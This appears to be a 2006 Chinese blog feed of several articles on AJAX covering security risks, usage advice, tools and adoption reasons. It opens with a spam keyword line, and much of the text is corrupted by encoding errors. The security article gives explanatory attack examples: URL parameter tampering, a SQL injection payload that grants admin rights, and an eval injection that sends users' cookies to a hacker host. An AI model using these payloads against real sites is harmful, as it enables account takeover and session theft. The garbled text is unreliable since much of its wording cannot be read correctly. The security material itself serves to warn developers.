久久99九九国产免费看小说,国产精品成人99久久久久 ,亚洲精品乱码久久久久久蜜桃

Jeff-Chen — Fri, 12 May 2006 08:32:00 GMT

Web开发者不会注意到由 “AJAX�Q�Asynchronous JavaScript And XML�Q�”所带来的激情。不费力气就能创建像Google Suggest那样的智能网站或者像Gmail那样��Z��Web的应用程序，�q�在很大�E�度上要归功于这�U�技术。然而，伴随着AJAX应用�E�序的发展，我们发现了它的一些不��之处，我们发现它的安全漏洞也在逐渐变大�Q�就像慢慢地把基于AJAX的站�Ҏ(gu��)��入了一颗定时炸弹中�?br />

AJAX的好�?br />
在当�q�“Web应用�E�序”的��好时代�Q�事情非常简单。你填写了一个表单，点击“提交”按钮，然后当前屏幕��消�׃��Q�等待一��会儿后你就转入��C��下一个页面。今天的状况已经不是�q�样的了�Q�用户需要的是一�U�就像�Q何桌面应用程序那��h��畅、快捷和人性化的Web体验�?br />
AJAX�l�常是和DHTML�Q�Dynamic HTML�Q�一起协作的�Q�它的顺利执行需要允许网��中的JavaScript代码和web服务器在后台无缝通讯。比方说�Q�当你开始在Google Suggest的搜索框中输入东西时�Q�web��面��和服务器在后台开始交换数据，然后会给��Z��些你可能需要的词条�{�。所有的�q�一切都不需要页面刷新或者按下�Q何按钮。同栯��也就是像Gmail那样的应用程序怎么能对实时拼写��查做的那么好的原因�?br />
AJAX怎样工作

AJAX复杂的原理已�l�超��Z��今天所要阐�q�的范围�Q�这里只��单描�q�C��下。你的页面上的JavaScript代码能够在不依赖于用��L��情况下和你的Web服务器取得联�p�R��这里面��h��心作用的��是JavaScript的XMLHttpRequest对象�Q�这个对象能够被��像用户敲击键盘或者时钟事件在后台或者异步触发（也就是术语异步JavaScript和XML�Q��?br />
如果你在Google Suggest中输入“ajax”后�Q�就会得到像我输入后得到的服务器��h��一��P��
1. www.google.com/complete/search?hl=en&js=true&qu=aj
2. www.google.com/complete/search?hl=en&js=true&qu=aja
3. www.google.com/complete/search?hl=en&js=true&qu=ajax

在这个术语中的XML部分有一点会引�v��Z��的误解，其实�q�一部分是没有�Q何意义的。它是从JavaScript对象得来的名字，同时许多AJAX风格的应用程序��用了XML�Q�这个对象能够就��M��事务向服务器发出一个请求。甚至JavaScript代码本��n也能够被取回和评估。��l�完成我的输入“ajax example”，��会从Google的服务器产生下面的回应：
sendRPCDone(frameElement, "ajax example", new Array("ajax example", "ajax examples"), new Array("153,000 results", "177,000 results"), new Array(""));

�q�将会给你一些关于强大的AJAX的暗�C�吧�Q�它��h��在运行中�Q�on the fly�Q�把新的JavaScript代码加入到浏览器中的能力。然而，最优化的方法看��h��好像束缚了XML协定。�D个例子说明一下，比如Google产生了下面的�q�个东西�Q?br />    ajax example
    153,000
    ajax examples
    177,000

昄��Q�你可以在一个合适的表单中解释这些XML数据�Q�但我们要感谢JavaScript�Q�它��实能够在一些非常典型的限制条�g下和大量讨厌的IE bug环境里非常好的处理XML对象�?br />
��Z��帮助你理解一些Ajax的问题，我在�q�里�l�你介绍一个假想的旅行公司�Q�“时代尖端旅行公司”。由于受到AJAX bug的推动，他们的主要web开发者Max Uptime��Z��创徏一个这��L��应用�E�序�Q�他军_��混合使用AJAX�Q�这��P��他走在时代尖端了�?br />
AJAX的问�?br />
半数以上的AJAX安全风险来自隐含在服务器中的漏洞。显�Ӟ��使用安全�~�码技术的好的设计�Q�对于更安全的AJAX大有帮助�Q�我们需要感谢Max熟�?zh��n)�开放万�l�网应用安全计划�Q�the Open Web Application Security Project - OWASP�Q�排名前十的最严重web应用�E�序安全漏洞列表�Q�www.owasp.org�Q�。不�q�的是，当Max实现AJAX的时候，他仍焉��要面对许多额外的因素�Q?br />
1.新的技术：如果Max��x��他的站点�q�接��C��个SQL数据库，他在Google查到了数百万的例子。AJAX技术，不管�q�种技术有多年轻，它仍然是出现在采购��@环中相对较早的，��管它只有很��一部分好的例子出现在网�l�上。�ؓ了解决一些难处理的和不必要的复杂问题�Q�这��p��求像Max那样的开发者去自主开发。Max也就不得不编写服务器端和客户端的代码�Q�创��Z��自己不太��定的协议（特别是对服务器响应来�Ԍ��。不��这些协议有多好�Q�都��会及时表现在页面上�?br />
2.非传�l�方式的设计�Q�AJAX有一点点不同于传�l�设计方式，因�ؓ�q�样的应用程序是半客��L��半服务端的。在Max的例子里�Q�他是唯一的开发者，所以他为服务端和客��L��都能够进行编码。在同一旉��使用两种不同的语�a��Q�特别是在早期阶�D�）�q�行开发将会��生一些初�U�的�~�码错误�Q�因��Z��要在两端来回跌��Q�对一端来讲非常好�Q�但可能在另一端不能够胜�Q。即使Max有一个大的开发团队，安全�~�码责�Q也可能在服务端和客户端开发小�l�之间代码移交的时候发生问题�?br />
3.太多的脚本语�a��Q�Max凭借他自己的聪明才智决定徏立世界上最优秀的旅行登记工兗��你从输入你现在的位�|�（通过邮政�~�码、电(sh��)话区��h��者GPS�{�等�Q�开始登讎ͼ��q�时候一个AJAX��h��׃��被立卛_��送来��定你确切的位置。从那时候开始，屏幕上就会填入你所有可以利用的旅行方式�Q�这一切甚至都是在你决定你惌��M��么地斏V��你打算什么时候动�w�和你打��和谁一同去之前��完成的�?br />
�q�个屏幕上的单元格和控�g都充满了AJAX驱动�Q�服务器端和客户端的脚本可能需要超�q?0个不同的服务器调用。你可以惛_��一个很��的个体服务器程序，比如findairportsbylocation.aspx 或者 determinemaxbaggageallowancebyairline.php.

显而易见，如果没有Max的仔�l�计划（比如创徏多功能的“重载”JavaScript函数和服务器脚本�Q�，每一�ơ设计他都需要创��q?0个独立的部分。更多的�~�程意味着会��生更多的错误和bug�Q�意味着需要更多的旉��ȝ��写、管理、测试和更新代码。不仅如此，因�ؓ在客��L��的JavaScript代码中应用了大量的这�U�脚本，他们在正式的�E�序��试中也�Ҏ(gu��)��变得很健忘�?br />
4.��定��部分的AJAX不会引�v危害�Q�这个站�Ҏ(gu��)��一个计划出行的站点�Q�但是Max考虑的是它将立刻��Z��提供一个显�C�精��位�|�的卫星视图�Q��ƈ且把你所要到辄��的地的天气情况也提供�l�你。AJAX最大的诱惑之一看�v来好像是直到最后一��d��q�在�q�行其它的操作，��像一个讲解员在那里解说一��P��Z��AJAX使用了AJAX。当Max开始尝试他的新��x��Ӟ��他会逐渐��试增加更多新的功能�Q�完全忽视测试的需要�?br />
5.不安全的通讯�Q�每一个AJAX调用可能只回传很��数量的数据�l�客��L��Q�但那些数据是私有的、保密的。Max可以�~�写一个便利的工具来对你的信用卡号码进行数字校验，但是如果使用�U�文本代替over SSL�q�行发送数据会怎样呢？�q�是一个显而易见的问题�Q�但是当有许多例行程序需要考虑�Q�特别是屏幕上其�?9�Q�的数据不是真正的机密数据时�Q�很�Ҏ(gu��)��׃��忽视掉SSL的�?br />
6.服务器端讉K��控制�Q��用JavaScript�E�序来触发AJAX�l�常会掩��C��些显而易见的�~�码错误�Q�服务器端访问控制就是一个例子。假设Max惛_��考你上次游览的一个详�l�目的地来�ؓ你提供你中意的旅馆，他可能会是像下面�q�样�Q?br />showprevioushotels.aspx?userid=12345&destination=UK

�q�当然是非常好的�Q�但是如果一个恶意用��h��URL�Ҏ(gu��)��了如下所�C��怎么办呢�Q?br />    showprevioushotels.aspx?userid=12346&destination=%

他们会得到其他�h最喜爱的旅馆吗�Q�（注意�Q�％在SQL语句中是通配�W�）。无疑，�q�是一个没有什么危害的例子�Q�但是Max应该使用session、cookie或者其它符号�Ş式来��保数据能�ƈ且只能发送到正确的用户那里。它们可能仅仅是数据的一��部分，但它们可能就是最重要的一��部分�?br />
7.服务器端验证�Q�实际上�q�里有两个问题。第一�Q�AJAX控制�l�常被用来在用户最后提交到服务器之前的输入验证。这�ȝ��了Max�Q��Max有一�U�虚假的安全感，原因是他建立了称作alloweddestinations.php的函敎ͼ��Ҏ(gu��)��用户的ID来决定他们能够到辄��正确目的地�?br />
因�ؓ�q�是一个服务器端的��查，当这个页面最后被提交的时候他不必再次为在服务器上做检查而烦��|��q�里我们假定不会有恶意的用户暗中破坏从alloweddestinations.php的响应或者破坏对服务器最后的��h��?br />
AJAX控制可以比用戯��己更仔细验证用户的输入，但是他们�q�是�l�常在服务器上最后做一�ơ验证�?br />
AJAX验证的第二个问题��是控制本��n会受到验证漏�z�的影响。这里再�ơ强调一下，URL通常是隐藏着的，所以也会经常忘掉它。�D例说明一下，也许我可以��用SQL Injection来对刚才的脚本进行攻击，如下所�C�：
    showprevioushostels.aspx?userid='; update users set type='admin' where userid=12345;--

��׃��让我��d��后具有系�l�管理员的权限。当�Ӟ��如何取得那些表名�Q�table�Q�和字段名已�l�超��Z��本文讨论的范��_��但是你已�l�了解这�U�情况了�Q�不是吗�Q?br />
8.客户端验证：我们已经知道在刚才的Google Suggest例子中，通过��单评��服务端的响应后动态创建和执行JavaScript函数是可行的。如果没有�Q何�Ş式的验证�Q�如果这��L��话在客户端很难保证可靠性和��畅性）�Q�客��L��仅仅简单执行服务器需要它完成的事情�?br />
�q�样的话�Q�由于真正的代码怎么执行的对于一个普通用��h��讲是永远看不到的�Q�也��是说你不能够“查看源文�g”）�Q�于是潜在地为恶意的黑客们打开了一个完全的��d��导向。如果服务器的响应持�l�不断地被捣乱（�q�种破坏行�ؓ可能是在Web服务器本�w�也可能是在数据传输�q�程中）�Q�这�U�攻��d��很难被发现�?br />
Max使用下面的响应在目的地网��上更新天气图标�Q�他是用的函数是eval();函数�Q?br />    updateWeatherIcon('cloudy.gif');

然而，恶意的cracker能够把这个函数变成下面的形式�Q�这栯��发现�q�种��d��更加困难了�Q?br />    updateWeatherIcon('www.myhackingsite.ru/grab.aspx?c=' + document.cookies);     updateWeatherIcon('cloudy.gif');

我们现在能够在我们自��q��服务器上跟踪每一个用��L��session ID/cookie�?br />
��结

毫无疑问�Q�AJAX和AJAX-style技术都是通向web设计的光明大道。开发者可以在web上创造出以前从所未有的真正的“应用程序”，使用AJAX必须��心谨慎�Q�这��h��能够保证web站点的安全�?br />
然而，最大的威胁之一�Q�来自日益复杂的使用AJAX的客��L��脚本和服务器端脚本。这些脚本被技术手�D�隐藏在了视�U�之外，使测试很不直观；同时�Q�这�U�新技术看��h��也��web开发者忘掉了基本的好的编码方式。就像访问控制和输入校验�q�样的问题也不会消失�Q�它们变得更多更复杂了�?br />
5个最重要的AJAX安全提示�Q?br />
��Z��取得成功�Q�你必须从好的计划开始。必��集中你的才智减��和��化AJAX调用�Q�创��Z��个标准的响应格式�Q�在��M��地方都要遵��@�q�个协定�Q�理想的XML�Q��?br />
遵��@来自像开放万�l�网应用安全计划那样的站点的最优方法。这里面特别包含了访问控制和输入校验漏洞��查，同时��保敏感信息使用over SSL胜过使用普通文本�?br />
永远不要假设服务器端AJAX对于讉K��控制或者用戯��入校验检查能够代替在服务器上的最�l�再��查。增加AJAX控制永远不会减少你的验证工作量，它们只能增加你的工作量�?br />
永远不要假设客户端的��h��技术（obfuscation�Q�在�q�里指��JavaScript难于阅读和解码）能够保护你非帔R��要的商业�U�密。��用JavaScript是隐藏程序设计最没用的一�U�手�D�，�q�能够�ؓ你的�Ҏ(gu��)��提供好处�?br />
最后，你必��非常好的领��g��的开发团队。��用AJAX听�v来非常引人注目，但是你应该认识到要保留你的开发团队以便开发版�?�Q�当然现在你应该开发非常稳定的版本1�?br />

Jeff-Chen 2006-05-12 16:32 发表评论

Jeff-Chen — Fri, 12 May 2006 08:00:00 GMT

不可否认�Q�我是非常看好AJAX技术的。我以�ؓAJAX技术对于互联网�Q�就像HTML对于互联�|�一栗��但同时又要看到�Q�AJAX技术不能完全取代我们常规的WEB开发技术。AJAX技术有它让人眼睛一亮的优点�Q�同时它也有很多��q��。我们作为开发�h员，不能因�ؓAJAX技术好�Q�就在WEB开发中全部使用AJAX�?br />
　　对了�Q�不能�ؓ了AJAX而AJAX�Q�就像钢要用到刀刃上一��P��AJAX应该用在能充分发挥它的优点的地方。而大多数的时候，我们�q�需要和往�怸��P��使用MVC的实现STRUTS开发框架�?br />
　　提到AJAX�Q�不能不提到与它一赯��的另一个词:用户体验。AJAX丰富了B/S模式的表现层�Q�对于B/S模式的UI来说�Q�它��L��没有做不到、只有想不到。这里说来说去，都是一个用户体验的问题。AJAX��L��无刷斎ͼ�其实很多时候，用户需要有��h��才能知道有了��面提交�Q�如在保存数据的时候，所以在�q�个时候��用AJAX却有害于用户体验的�?br />
　　那么在什么时候可能��用到AJAX�?�W�一、请求的提交是�ؓ了页面数据的昄��Q�这时候用户一般不希望看到��面的刷斎ͼ�是��用AJAX的一个最��x��候。第二、如果请求提交后�Q�用戯��从页面感觉到提交�l�果�Q�这时候，也最好不要有��面��h��Q�推荐��用AJAX技术。第三、如果请求提交后�Q�用户不能从��面感觉到提交动作，如绝大多数时候的数据的增加和修改�Q�这时候则需要页面刷斎ͼ�不能使用AJAX技术。第四、复杂的UI�Q�以前对于复杂的C/S模式的UI�Q�B/S模式一向采取逃避的方法，现在则可以放心大胆的使用AJAX来加以解冟�?br />
　　AJAX技术的实践�Q�就像有了魔法一��P��一旦你使用了一�ơ，��׃��׃��释手。面对精彩的AJAX技术，�q�等什�?赶快看看�(zh��n)�的WEB应用里，有没有下列问题之一�Q�如果有的话�Q�不妨用AJAX试试�?

　　�W�一、输入值校验的问题

　　输入校验是我们经帔R��到的问题�Q�这�U�问题很多时候是可以在JS里解冟뀂但有些时候却需要访问后収ͼ�如在甌��用户的时候检查用户名是否重复�{�等问题。用AJAX吧，��面不会有刷新�?br />
　　�W�二、��联显�C�的问题

　　�q�种问题应该是我们遇到的最多的表现层的问题�Q�常常让我们左右为难:你说讉K��后台吧，��面需要刷斎ͼ�用户体验很不�?你说用JS解决吧，��实有点让JS勉�ؓ光��Q�强行用JS解决了，代码一大堆不说�Q�数据量大的话还会有内存问题�Q�而且数据也不安全�?br />
　　�q�类的问题很�?最常见的是�U�联的两个或更多的选择框，�q�有选择框的变�Ş�Q��联菜单，��D��树等�{��?br />
　　遇到了这一�cȝ��问题�Q�赶快行动吧!用AJAX讉K��后台�Q�既不需要刷新页面，也没有过多的JS代码�Q�一举两得�?br />
　　�W�三、请求结果只改变部分��面

　　�q�一�cȝ��问题我们也会时常��到�Q�如�Q�论坛的回复帖子和帖子列表在一个页面上的时候。这两个UI在一个页面上�Q�用户体验比回复帖子在另外一个页面好。但回复后要�Ҏ(gu��)��个页面进行刷斎ͼ��q�种感觉��׃��好了。你看，那么大一个帖子列表，只增加你的一个回复，却要�Ҏ(gu��)��个页面进行刷斎ͼ�不管从哪个角度来看都不好�?br />
　　�q�一�cȝ��问题不管是用户体验，�q�是从技术的角度来讲�Q�都是��用AJAX最好不�q��?br />
　　�W�四、由于技术原因而��用iframe的问�?br />
　　Iframe的问题纯�_Ҏ(gu��)��׃��技术的原因引�v的。�ؓ了解��x��术问题而引入iframe,却iframe的一再嵌套却又引入了其他的技术难题。有的想��办法来勉强解决�q�个问题�Q�有的却�q�脆不要使用iframe。不使用iframe�Q�而��用JS的解��x��法却是繁琐的。现在不用左右�ؓ难了�Q��用AJAX��是最好的解决�Ҏ(gu��)��?br />
　　�W�五、数据录入和列表昄��在同一个页�?br />
　　C/S模式的UI中常常有数据录入和数据列表显�C�在同一个界面上�Q�这样对于用��h��说有很好的用户体验，用户录入的结果马上就能在同一界面昄��。但是在B/S的UI上，�׃��需要提交刷新的问题�Q�我们经常把数据的录入和数据昄��分别攑֜�两个不同的页面上。很昄��Q�这��L��用户体验肯定没有C/S模式来得好。像�q�样的问题还有很多，在B/S模式下，都因为技术的原因而选择其他的解军_��法。现在我们可以自豪的使用AJAX来宣告可以做出和C/S模式一样复杂的UI了�?br />
　　�W�六、翻��问�?br />
　　如果有技术可以�ɾ��页不需要刷斎ͼ�你愿不愿意尝试一下呢?有很多这��L��数据昄��的问题需要刷新哦�Q�考虑一下AJAX!

Jeff-Chen 2006-05-12 16:00 发表评论

Jeff-Chen — Fri, 12 May 2006 07:52:00 GMT

��Z��XML的异步JavaScript�Q�简�U�AJAX�Q�是当前Web创新(�U�CؓWeb2.0)中的一个王冠。感谢组成AJAX的各�U�技术，Web应用的交互如Flickr, Backpack和Google在这斚w��已经有质的飞跃。这个术语源自描�q�C��Z��|�页的Web应用到基于数据的应用的�{换。在��Z��数据的应用中�Q�用户需求的数据如联�p�M�h列表�Q�可以从独立于实际网��늚�服务端取得�ƈ且可以被动态地写入�|�页中，�l�缓慢的Web应用体验着色��之像桌面应用一栗��?br />
　　虽然大部分开发�h员在�q�去使用�q�XMLHttp或者��用Iframe来加载数据，但仅到现在我们才看到传统的开发�h员和公司开始采用这些技术。就像新的编�E�语�a�或模型伴随着更多的痛苦，开发�h员需要学习新的技巧及如何最好利用这些新技术�?br />
　　AJAX模式

　　许多重要的技术和AJAX开发模式可以从现有的知识中获取。例如，在一个发送请求到服务端的应用中，必须包含��h��序、优先��、超时响应、错误处理及回调�Q�其中许多元素已�l�在Web服务中包含了�Q�就像现在的SOA。AJAX开发�h员拥有一个完整的�pȝ��架构知识。同�Ӟ��随着技术的成熟�q�会有许多地斚w��要改�q�，特别是UI部分的易用性�?br />
　　AJAX开发与传统的CS开发有很大的不同。这些不同引入了新的�~�程问题�Q�最大的问题在于易用性。由于AJAX依赖��览器的JavaScript和XML�Q�浏览器的兼�Ҏ(gu��)��和支持的标准也变得和JavaScript的运行时性能一样重要了。这些问题中的大部分来源于浏览器、服务器和技术的�l�合�Q�因此必��ȝ��解如何才能最好的使用�q�些技术�?br />
　　�l�合各种变化的技术和��合的客��h��务端环境�Q�AJAX提出了一�U�新的开发方式。AJAX开发�h员必��ȝ��解传�l�的MVC架构�Q�这限制了应用层�ơ之间的边界。同�Ӟ��开发�h员还需要考虑CS环境的外部和使用AJAX技术来重定型MVC边界。最重要的是�Q�AJAX开发�h员必��ȝ��止以��面集合的方式来考虑Web应用而需要将其认为是单个��面。一旦UI设计与服务架构之间的范围被严格区分开来后�Q�开发�h员就需要更新和变化的技术集合了�?br />
　　时刻想着用户

　　AJAX的最大机遇在于用户体验。在使应用更快响应和创新的过�E�中�Q�定义Web应用的规则正在被重写;因此开发�h员必��L��注重用户。现在用户已�l�逐渐习惯如何使用Web应用了。例如用户通常希望每一�ơ按钮点��M��D��几秒的�g�q�和屏幕��h��Q�但AJAX正在打破�q�种长时间的状况。因此用户需要重��C��验按钮点�ȝ��响应了�?br />
　　可用性是AJAX另�h�Ȁ动的地方而且已经产生了几�U�新颖的技术。其中最引�h注目的是一�U�称为“黄色隐出”的技术，他在数据更新之前时将用户界面变�ؓ黄色�Q�更新完成后立刻恢复原来的颜艌Ӏ�AJAX开发�h员将用户从Web应用的负载中解放出来;��心地利用AJAX提供的丰富接口，不久桌面开发�h员会发现AJAX是他们的方向�?br />
　　几种工具和技�?br />
　　随着AJAX�q�速地引�h注目��h��Q�我惛_��发�h员对�q�种技术的期待也迅速地增加。就像�Q何新技术，AJAX的兴��Z��需要一整个开发工�?�~�程语言及相��x��术系�l�来支撑�?br />
　　JavaScript

　　如名字所�C�AJAX的概念中最重要而最被忽视的是他也是一�U�JavaScript�~�程语言。JavaScript是一�U�粘合剂使AJAX应用的各部分集成在一赗��在大部分时��_��JavaScript通常被服务端开发�h员认为是一�U�企业��应用不需要��用的东西应该��力避免。这�U�观�Ҏ(gu��)��来自以前�~�写JavaScript代码的经�?�J�杂而又易出错的语言。类似的�Q�他也被认�ؓ��应用逻辑��L��地散布在服务端和客户端中�Q�这使得问题很难被发现而且代码很难重用。在AJAX中JavaScript主要被用来传递用��L��面上的数据到服务端�ƈ�q�回�l�果。XMLHttpRequest对象用来响应通过HTTP传递的数据�Q�一旦数据返回到客户端就可以立刻使用DOM��数据放到网面上�?br />
　　XMLHttpRequest

　　XMLHttpRequest对象在大部分��览器上已经实现而且拥有一个简单的接口允许数据从客��L��传递到服务端，但�ƈ不会打断用户当前的操作。��用XMLHttpRequest传送的数据可以是�Q何格式，虽然从名字上��是XML格式的数据�?br />
　　开发�h员应该已�l�熟�(zh��n)�了许多其他XML相关的技术。XPath可以讉K��XML文��中的数据�Q�但理解XML DOM是必��ȝ��。类似的�Q�XSLT是最��单而快速的从XML数据生成HTML或XML的方式。许多开发�h员已�l�熟�(zh��n)�Xpath和XSLT�Q�因此AJAX选择XML作�ؓ数据交换格式有意义的。XSLT可以被用在客��L��和服务端�Q�他能够减少大量的用JavaScript�~�写的应用逻辑�?br />
　　CSS

　　��Z��正确的浏览AJAX应用�Q�CSS是一�U�AJAX开发�h员所需要的重要武器。CSS提供了从内容中分��d��用样式和设计的机制。虽然CSS在AJAX应用中扮演至关重要的角色�Q�但他也是构建创��览器应用的一大阻��，因�ؓ不同的浏览器厂商支持各种不同的CSS�U�别�?br />
　　服务器端

　　但不像在客户端，在服务端AJAX应用�q�是使用建立在如Java,.Net和PHP语言基础上机�?�q�没有改变这个领域中的主要方式�?br />
　　既然如此�Q�我们对Ruby o-n Rails框架的兴��也��p��速增加了。在一�q�多前，Ruby o-n Rails已经吸引了大量开发�h员基于其强大功能来构建Web和AJAX应用。虽然目前还有很多快速应用开发工具存在，Ruby o-n Rails看�v来已�l�储备了��化构建AJAX应用的能力�?br />
　　开发工�?br />
　　在实际构建AJAX应用中，你需要的不只是文本编辑器。既然是JavaScript非编译的�Q�他可以�Ҏ(gu��)��地编写和�q�行在浏览器�?然而，许多工具提供了有用的扩展如语法高亮和��完成�?br />
　　不同的IDE提供了对JavaScript支持的不同等�U�。来自JetBrains的IntelliJ IDEA是一个用来JavaScript开发的更好的IDE�Q�虽然许多开发�h员也喜欢Microsoft’s Visual Studio产品(允诺会在最新的版本中改善对AJAX的支�?。Eclipse包含了两个免费的JavaScript�~�辑器插件和一个商业的来自ActiveStat的Komodo IDE�?br />
　　另一个JavaScript和AJAX开发中的问题是调试困难。不同的��览器提供不同的通常是隐藏的�q�行旉��误信息，而JavaScript的缺陷如双重变量赋�?通常是由于缺��数据类�?使得调试更加困难。在AJAX的开发中�Q�调试就更复杂了�Q�因为其需要标识究竟是客户端还是服务端产生的错误。在�q�去�Q�JavaScript调试的方法是删除所有代码然后一行行的增加直到错误出现。现在，更多开发�h员回��CؓIE准备的Microsoft Script Debugger和�ؓMozilla��览器准备的Venkman�?br />
　　��览器兼�Ҏ(gu��)�?br />
　　JavaScript�~�程的最大问题来自不同的��览器对各种技术和标准的支持。构��Z��个运行在不同��览�?如IE和火�?是一个困隄��d��。因此几�U�AJAX JavaScript框架或者生成基于服务端逻辑或标记库的JavaScript�Q�或者提供符合跨��览器AJAX开发的客户端JavaScript库。一些流行的框架包括:AJAX.Net, Backbase, Bitkraft, Django, DOJO, DWR, MochiKit, Prototype, Rico, Sajax, Sarissa, and Script.aculo.us.

　　�q�些框架�l�开发�h员更多的�I�间使得他们不需要担心跨��览器的问题。虽然这些框架提升了开发�h员构建应用的能力�Q�但�׃��厂商已经开发了更细节的用户界面的打包组件解��x��案，因此在AJAX�l��g市场中需要考虑一些其他因素。例如提供通用用户界面的组件如�l�合框和数据栅格的几个厂商，都可以被用来在应用中创徏良好的通过�c�M��?sh��)子数据表方式来查看和编辑数据的体验。但�q�些�l��g不仅是封装了�l��g的用��L��面而且包括与服务端数据的通讯方式�Q�这些组仉��常使用��Z��标记方式来实现如ASP.Net或JSF控�g�?br />
　　展望

　　最�q�IE和火狐之间的��览器之争变得火热�v来，因此AJAX开发�h员需要��够敏��L��作出反应。关键点在一些问题如CSS或XML�Q�虽然各�U�浏览器形成采用最新标准的不同阵营(如Mozilla拥抱SVG和E4X标准及在最新火狐BETA版本中��用XUL�Q�而微软��用自��q��XAML技�?。所有这些技术代表当前AJAX��L��JavaScript和XML的市场方向改变�?br />
　　�ȝ��来说�Q�AJAX开发�h员必��d��快地跟进最新的技术�ƈ利用高��的工具集。成功的AJAX开发�h员还需要留心他们的使用者以避免��Q何问题扩大化。�ƈ且AJAX开发�h员还需要持�l�地创新来创建增强Web应用易用性的新方法�?br />

Jeff-Chen 2006-05-12 15:52 发表评论

Jeff-Chen — Wed, 10 May 2006 05:21:00 GMT

作者：AndreCharland

保守来说�Q�AJAX在现在是热得不能再热的技术。没有�h能否认，它拥有大批的支持者。在CNN上，它从二月份的一个不被看好的词语到十月䆾成长成一个初具雏形的技术。所以，有必要要看看��Z��么AJAX能发展成为现在的样子�Q��ؓ什么它能不断成长，�q�且在短的时间内�q�速变得无处不在。所以，我用午夜谈话的风��|��来给出需要AJAX技术的十大理由�?/p>

使用AJAX的十大理由：

10。XAML,XUL,XForms...�{�等�?/p>

9。服务端技术的不确定性�?/p>

8。Web2.0�?/p>

7。被软�g工业领袖们强劉K��用�?/p>

6。和Flex和Flash�{�技术的很好的集成�?/p>

5。边际成本低�?/p>

4。能使常规的Web应用受益�?/p>

3。跨��览器和跨��^台�?/p>

2。以可用性和用户体验为王�?/p>

1。基于公开标准�?/p>

十大理由�W�一名：公开标准

让我们从�W�一条开始，AJAX技术是��Z��被各大浏览器和��^台都支持的公开标准的技术。这意味着该技术不怕技术提供商的技术封锁。组成AJAX技术的大多数技术都能放心的使用很多�q�_��而那些不是热点的、最新的和未�l�考验的技术只能��用一�D�|��间。现在，对于�l�大多数的用户和企业来说�Q�浏览器是一个可信�Q的应用��^収ͼ��q�在五年前就不是个问题了。对于AJAX来说�Q�FIREFOX��览器的基础Mozilla1.0的发布�ƈ且支持XMLHTTPRequest对象是一个�{折点。这�U�允许异步数据交换的技术好多年前就被IE��览器支持了。这�U�支持和FIREFOX��览器的大量被采用真正的使�h们理解了跨浏览器的富Internet应用成�ؓ了可能�?/p>

1�Q�JavaScriptorECMAScript(StandardECMA-262)�Q�一个有��的事情是，Javascript是经�q�长旉��后才成�ؓ被�h们接受的技术，长时间以来，很多公司采用非Javascript技术的斚w��Q�幸�q�的是，�q�种状况被迅速的改变�?/p>

http://www.ecma-international.org/publications/standards/Ecma-262.htm

2�Q�XML�Q�是一个来自W3C的、被�q�泛应用的标准�?/p>

http://www.w3.org/XML/

3�Q�HTML�Q?a target="_blank">http://www.w3.org/MarkUp/

4�Q�CSS�Q?a target="_blank">http://www.w3.org/Style/CSS/

5�Q�XMLHTTPRequestObject�Q�被InternetExplorer、Mozilla-based、Safari和Opera��览器支持�?/p>

十大理由�W�二名：可用�?/b>

开发�h员和设计人员开始认识到不仅大型的用户体验在市场上是成功的，而且也认识到�q�样体验是怎么来媄响用��L��开销的。基于AJAX技术的google地图比传�l�的选择MapQuest更成功，证明了提供更好的用户体验的��品的成功。AJAX技术是使网�l�应用有更好的可用性的一个领导性的技术。它允许从服务器端请求少量的信息�Q�而不是整个网��c��它增加了页面数据的更新但同时减��了��面的刷新和��h��{�待�Q�这些问题从�|�络已诞生就折磨着Web应用�?/p>
��Z��已经知道他们需要一个优�U�的用��L��面�ƈ且有对该界面的投资意�ѝ��前提条件是�Q�用戯��够快速的取得信息不管数据是一个内部网的应用还是一个广域网的服务�?/p>
十大理由�W�三名：跨浏览器和跨�q�_��的兼�Ҏ(gu��)�?/b>

IE和基于Mozilla的FIREFOX是占据市场分额最大的两个��览器，�q�且它们都支持在��览器上��L��创徏��Z��AJAX的WEB应用。现在开发运行在更�ؓ先进的WEB��览器上的基于AJAX的富WEB应用成�ؓ了可能。这是�ؓ什么AJAX应用变得如此��行的一个最重要的原因。其实很多开发�h员多�q�前��意识到AJAX技术流行的可能�Q�但一直没有流行是因�ؓ��览器厂商的原因。感谢Mozilla和FIREFOX�?/p>
十大理由�W�四名：使常规的WEB应用受益

AJAX技术是当今WEB应用的门面——WEB应用获得的利益超�q�了桌面应用。这些利益包括部�|�应用的低投入、维护方�ѝ��羃短开发时间和不需要安装。这些都是促使商业和用户自从上世�U�九(ji��)十年代以来采用WEB应用的优炏V��AJAX技术不但能使WEB应用获得益处�Q�而且使最�l�用户受益�?/p>
十大理由�W�五名：促��技能、工具和技术的升��

�׃��AJAX��Z��q�些�q�一直��用的一些公开标准�Q�很多的开发�h员就会有新的技术方面的要求以便能够开发AJAX应用。但�q��ƈ不意味着开发团队从��Z��HTML和FORM的应用�{�U�d��富AJAX型应用需要很高的学习曲线。同�Ӟ��q�意味着开发WEB应用的开发团体需要加速将他们的用��h��口升�U�到AJAX�Q�但�q�不需要一个大规模的升�U�和重写他们的WEB应用。自从上世纪�?ji��)十�q�代以来�Q�在开发基于浏览器应用�Ҏ(gu��)��׃��大量投资的那些系�l�强烈的希望能在现有的应用的基础上增加用户体验�?/p>
十大理由�W�六名：能和Flex和Flash�{�技术的很好的集�?/b>

大多数的开发社区都不再支持FlashvsAJAX的火热讨论，�q�两�U�技术都在不同的场合拥有各自的优点和�~�点�Q�但是它们有大量的机会可以集成到一起工作。很多的开发�h员和技术提供商意识到这一点，�q�且开发出了伟大的产品来集成Flex和AJAX协调使用。我们也热切的期望看��C��者能在Macromedia里一起工作�?/p>
十大理由�W�七名：采用�?/b>

AJAX被业内领袖广泛采用证明了市场的欢�q�程度和该技术组的正��。每一个该技术的使用者都成�ؓ了胜利者：包括google、yahoo、Amazon和微软等�{�。是google地图吸引了WEB开发�h员的目光�Q�当��Z��开始调查是什么原因��得google有着如此惊�h的用户体验的时候，��Z��揭开了罩在AJAX头上的面�U��?/p>
当然�Q�仅仅是google使用AJAX是不够��得这��Ҏ(gu��)��术跨��从支流��C��的鸿沟的。但是，如果你看一看��用AJAX技术的客户如eBusinessApplications(www.ebusinessapps.com)orTibco(http://www.tibco.com)�{�的表单�Ӟ��你就会发现胦�?00强包括主要的金融机构、政府机构、航�I�公司和其他主要商业机构采用AJAX�Q��ƈ且在AJAX成�ؓ��通货之前很早��开始��用了�?/font>

十大理由�W�八名：WEB2.0

